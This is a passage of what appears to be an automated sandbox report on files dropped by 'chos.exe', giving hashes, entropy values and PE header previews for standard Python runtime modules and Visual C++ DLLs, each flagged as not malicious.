Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...]..f.........." .....B...&......P.....................................................`..........................................i..0....k..d...............................(... b..............................@b..8............`...............................text....A.......B.................. ..`.rdata..P....`.......F..............@..@.data........p.......V..............@....pdata...............^..............@..@.rsrc................b..............@..@.reloc..(............d..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\PublicKey\_ed448.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	6.064677498000638
Encrypted:	false
SSDEEP:	1536:BrYNvxcZeLrIeNs2qkTwe57DsuP45PqAqVDK9agdUiwOXyQdDrov0slb8gx4TBKW:Br4vxcZeLrIeN1TvHsuP45yAqVDK9ag3
MD5:	8A0C0AA820E98E83AC9B665A9FD19EAF
SHA1:	6BF5A14E94D81A55A164339F60927D5BF1BAD5C4
SHA-256:	4EE3D122DCFFE78E6E7E76EE04C38D3DC6A066E522EE9F7AF34A09649A3628B1
SHA-512:	52496AE7439458DEDB58A65DF9FFDCC3A7F31FC36FE7202FB43570F9BB03ABC0565F5EF32E5E6C048ED3EBC33018C19712E58FF43806119B2FB5918612299E7E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...\|...5...}...~...U...,...u...,...v...,...}.......\|............._.............Rich~...................PE..d...^..f.........." .........8......`.....................................................`..........................................C..h...HE..d....p.......`..l...............(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..l....`.......>..............@..@.rsrc........p.......H..............@..@.reloc..(............J..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_cpuid_c.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.675380950473425
Encrypted:	false
SSDEEP:	96:frQRpBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSztllIDpqf4AZaRcX6gnO:Qddz2KTnThIz0qfteRIDgRWcqgnCWt
MD5:	44B930B89CE905DB4716A548C3DB8DEE
SHA1:	948CBFF12A243C8D17A7ACD3C632EE232DF0F0ED
SHA-256:	921C2D55179C0968535B20E9FD7AF55AD29F4CE4CF87A90FE258C257E2673AA5
SHA-512:	79DF755BE8B01D576557A4CB3F3200E5EE1EDE21809047ABB9FF8D578C535AC1EA0277EDA97109839A7607AF043019F2C297E767441C7E11F81FDC87FD1B6EFC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................@'..\|....'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Util\_strxor.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.625428549874022
Encrypted:	false
SSDEEP:	96:flipBddzAvzrqTOy/ThIz014mlxuLnkC75JiSBhsPeSzteXuDVZqYNIfcX6gHCWx:Cddz2KTnThIz0qfteR5DVwYkcqgHCWt
MD5:	F24F9356A6BDD29B9EF67509A8BC3A96
SHA1:	A26946E938304B4E993872C6721EB8CC1DCBE43B
SHA-256:	034BB8EFE3068763D32C404C178BD88099192C707A36F5351F7FDB63249C7F81
SHA-512:	C4D3F92D7558BE1A714388C72F5992165DD7A9E1B4FA83B882536030542D93FDAD9148C981F76FFF7868192B301AC9256EDB8C3D5CE5A1A2ACAC183F96C1028B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...Z..f.........." ................P........................................p............`......................................... '..t....'..P....P.......@...............`..(....!...............................!..8............ ...............................text...h........................... ..`.rdata..`.... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\VCRUNTIME140_1.dll

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	6.701724666218339
Encrypted:	false
SSDEEP:	768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
MD5:	68156F41AE9A04D89BB6625A5CD222D4
SHA1:	3BE29D5C53808186EBA3A024BE377EE6F267C983
SHA-256:	82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
SHA-512:	F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......\|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_asyncio.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	70928
Entropy (8bit):	6.242470629630265
Encrypted:	false
SSDEEP:	768:FCIB0WWuqkJS86D6rznO6uqM+lY5ZkesIcydIJvn/5YiSyvT2ETh:FCY0WStDwnOLYY5ZkeddIJvnx7Sy75h
MD5:	80083B99812171FEA682B1CF38026816
SHA1:	365FB5B0C652923875E1C7720F0D76A495B0E221
SHA-256:	DBEAE7CB6F256998F9D8DE79D08C74D716D819EB4473B2725DBE2D53BA88000A
SHA-512:	33419B9E18E0099DF37D22E33DEBF15D57F4248346B17423F2B55C8DA7CBE62C19AA0BB5740CFAAC9BC6625B81C54367C0C476EAECE71727439686567F0B1234
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z...........%.....................................................K...................I...........Rich...................PE..d......g.........." ...).d................................................... ............`.........................................`...P.......d......................../.............T...............................@...............(............................text...)b.......d.................. ..`.rdata...O.......P...h..............@..@.data...`...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	84240
Entropy (8bit):	6.607563436050078
Encrypted:	false
SSDEEP:	1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
MD5:	CB8C06C8FA9E61E4AC5F22EEBF7F1D00
SHA1:	D8E0DFC8127749947B09F17C8848166BAC659F0D
SHA-256:	FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
SHA-512:	E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_cffi_backend.cp313-win_amd64.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	6.189919896183334
Encrypted:	false
SSDEEP:	3072:X3LjFuaTzDGA3GrJwUdoSPhpRv9JUizQWS7LkSTLkKWgFIPXD0:X3QaT3GA3NSPhDsizTikSTLLWgF0z0
MD5:	5CBA92E7C00D09A55F5CBADC8D16CD26
SHA1:	0300C6B62CD9DB98562FDD3DE32096AB194DA4C8
SHA-256:	0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
SHA-512:	7AB432C8774A10F04DDD061B57D07EBA96481B5BB8C663C6ADE500D224C6061BC15D17C74DA20A7C3CEC8BBF6453404D553EBAB22D37D67F9B163D7A15CF1DED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i..#-p.p-p.p-p.p$..p!p.p=.q/p.p=.zp)p.p=.q)p.p=.q%p.p=.q!p.pf..q)p.p9.q.p.p-p.p.p.pe..q)p.p$..p,p.pe..q,p.pe.xp,p.pe..q,p.pRich-p.p........................PE..d..._..f.........." ...).....B......@........................................0............`..........................................h..l....i..................T............ ......0O...............................M..@............................................text............................... ..`.rdata..............................@..@.data....].......0...n..............@....pdata..T...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131344
Entropy (8bit):	6.311142284249784
Encrypted:	false
SSDEEP:	3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
MD5:	A55E57D7594303C89B5F7A1D1D6F2B67
SHA1:	904A9304A07716497CF3E4EAAFD82715874C94F1
SHA-256:	F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
SHA-512:	FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	277776
Entropy (8bit):	6.5855511991551
Encrypted:	false
SSDEEP:	6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
MD5:	F3377F3DE29579140E2BBAEEFD334D4F
SHA1:	B3076C564DBDFD4CA1B7CC76F36448B0088E2341
SHA-256:	B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
SHA-512:	34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	6.220967684620152
Encrypted:	false
SSDEEP:	768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
MD5:	32D76C9ABD65A5D2671AEEDE189BC290
SHA1:	0D4440C9652B92B40BB92C20F3474F14E34F8D62
SHA-256:	838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
SHA-512:	49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	157968
Entropy (8bit):	6.854644275249963
Encrypted:	false
SSDEEP:	3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
MD5:	1BA022D42024A655CF289544AE461FB8
SHA1:	9772A31083223ECF66751FF3851D2E3303A0764C
SHA-256:	D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
SHA-512:	2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....\|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_multiprocessing.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35600
Entropy (8bit):	6.416657776501014
Encrypted:	false
SSDEEP:	768:6wehui7ZmQW/3OUDxEiNIJntJ5YiSyvSJz2Ec:whuilG+UDxEiNIJntX7Sy+zO
MD5:	705AC24F30DC9487DC709307D15108ED
SHA1:	E9E6BA24AF9947D8995392145ADF62CAC86BA5D8
SHA-256:	59134B754C6ACA9449E2801E9E7ED55279C4F1ED58FE7A7A9F971C84E8A32A6C
SHA-512:	F5318EBB91F059F0721D75D576B39C7033D566E39513BAD8E7E42CCC922124A5205010415001EE386495F645238E2FF981A8B859F0890DC3DA4363EB978FDBA7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.Y)v.7zv.7zv.7z..zt.7zf,6{t.7zf,4{u.7zf,3{~.7zf,2{{.7z>-6{t.7zv.6z..7z=.6{s.7z>-:{t.7z>-7{w.7z>-.zw.7z>-5{w.7zRichv.7z........PE..d......g.........." ...). ...>......@...............................................%.....`......................................... E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata..6 ...0..."...$..............@..@.data...p....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_overlapped.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55568
Entropy (8bit):	6.3313243577146485
Encrypted:	false
SSDEEP:	1536:+kMm7HdG/l5fW3UguCE+eRIJWtd7SyJds:+wIQUFCEbRIJWtd6
MD5:	A72527454DD6DA346DDB221FC729E3D4
SHA1:	0276387E3E0492A0822DB4EABE23DB8C25EF6E6F
SHA-256:	404353D7B867749FA2893033BD1EBF2E3F75322D4015725D697CFA5E80EC9D0F
SHA-512:	FEFB543D20520F86B63E599A56E2166599DFA117EDB2BEB5E73FC8B43790543702C280A05CCFD9597C0B483F637038283DD48EF8C88B4EA6BAC411EC0043B10A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.{X/.(X/.(X/.(QW_(\/.(H..)Z/.(H..)[/.(H..)P/.(H..)T/.(...)Z/.(X/.(//.(.W.)]/.(.W.)Y/.(...)Y/.(...)Y/.(..3(Y/.(...)Y/.(RichX/.(........................PE..d.....g.........." ...).L...`......@................................................}....`.............................................X................................/......(....f..T............................e..@............`...............................text....J.......L.................. ..`.rdata...8...`...:...P..............@..@.data...@...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	33552
Entropy (8bit):	6.446391764486538
Encrypted:	false
SSDEEP:	384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
MD5:	1C03CAA59B5E4A7FB9B998D8C1DA165A
SHA1:	8A318F80A705C64076E22913C2206D9247D30CD7
SHA-256:	B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
SHA-512:	783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83728
Entropy (8bit):	6.331814573029388
Encrypted:	false
SSDEEP:	1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
MD5:	FE896371430BD9551717EF12A3E7E818
SHA1:	E2A7716E9CE840E53E8FC79D50A77F40B353C954
SHA-256:	35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
SHA-512:	67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...\|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128272
Entropy (8bit):	6.294497957566744
Encrypted:	false
SSDEEP:	3072:N+tZdKmXhyn/qO6ItCpz6j5yQyshiKftdIJvQJL:NGZVwnxHssj5lhiYR
MD5:	D4E5BE27410897AC5771966E33B418C7
SHA1:	5D18FF3CC196557ED40F2F46540B2BFE02901D98
SHA-256:	3E625978D7C55F4B609086A872177C4207FB483C7715E2204937299531394F4C
SHA-512:	4D40B4C6684D3549C35ED96BEDD6707CE32DFAA8071AEADFBC682CF4B7520CFF08472F441C50E0D391A196510F8F073F26AE8B2D1E9B1AF5CF487259CC6CCC09
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............................................................[.....`..........................................{..P...P{.........................../..............T...............................@...............H............................text...t........................... ..`.rdata.............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181520
Entropy (8bit):	5.972827303352998
Encrypted:	false
SSDEEP:	3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
MD5:	1C0E3E447F719FBE2601D0683EA566FC
SHA1:	5321AB73B36675B238AB3F798C278195223CD7B1
SHA-256:	63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
SHA-512:	E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_uuid.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25872
Entropy (8bit):	6.591600232213824
Encrypted:	false
SSDEEP:	384:bROw4TUyiIWlIJ0wsaHQIYiSy1pCQxHoQSJIVE8E9VF0NyEIkz:4w4TUyfWlIJ0wT5YiSyvBk2E3kz
MD5:	3ACF3138D5550CA6DE7E2580E076E0F7
SHA1:	3E878A18DF2362AA6F0BDBFA058DCA115E70D0B8
SHA-256:	F9D5008F0772AA0720BC056A6ECD5A2A3F24965E4B470B022D88627A436C1FFE
SHA-512:	F05E90A0FEAA2994B425884AF32149FBBE2E11CB7499FC88CA92D8A74410EDCD62B2B2C0F1ECD1A46985133F7E89575F2C114BD01F619C22CE52F3CF2A7E37C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........p..#..#..#..\#..#..."..#..."..#..."..#..."..#..."..#..."..#..#...#..."..#..."..#..0#..#..."..#Rich..#........PE..d.....g.........." ...).....&......................................................".....`.........................................p9..L....9..x....`.......P.......6.../...p..@...`3..T........................... 2..@............0..8............................text...h........................... ..`.rdata.......0......................@..@.data...p....@.......&..............@....pdata.......P.......(..............@..@.rsrc........`.......*..............@..@.reloc..@....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\_wmi.pyd

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	38160
Entropy (8bit):	6.338856805460127
Encrypted:	false
SSDEEP:	768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
MD5:	1C30CC7DF3BD168D883E93C593890B43
SHA1:	31465425F349DAE4EDAC9D0FEABC23CE83400807
SHA-256:	6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
SHA-512:	267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
